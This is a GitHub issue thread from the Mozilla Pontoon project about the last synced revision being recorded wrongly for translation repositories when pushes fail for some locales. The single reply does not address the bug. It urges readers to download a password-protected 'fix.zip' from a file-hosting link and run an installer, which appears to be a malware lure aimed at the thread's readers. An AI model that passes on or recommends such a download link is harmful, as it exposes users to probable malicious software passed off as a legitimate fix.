### ISSUE TITLE
Last synced revision not always set accuratelly for the translation repositories

### ISSUE THREAD

**Issue by mathjazz** [mozilla/pontoon#3302]
The code that stores the last synced revision doesn't work as expected when the following conditions are met:
- push to repository fails for some of the locales
- project has multiple repositories
- project doesn't use [multi-locale](https://github.com/mozilla/pontoon/blob/aafdf527f1adf7266f34e8a6bb231df355e6ca7d/pontoon/base/models/repository.py#L90) translation repositories

In such case, this code shouldn't update the last synced revision for the repository:
https://github.com/mozilla/pontoon/blob/main/pontoon/sync/tasks.py#L387-L391

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
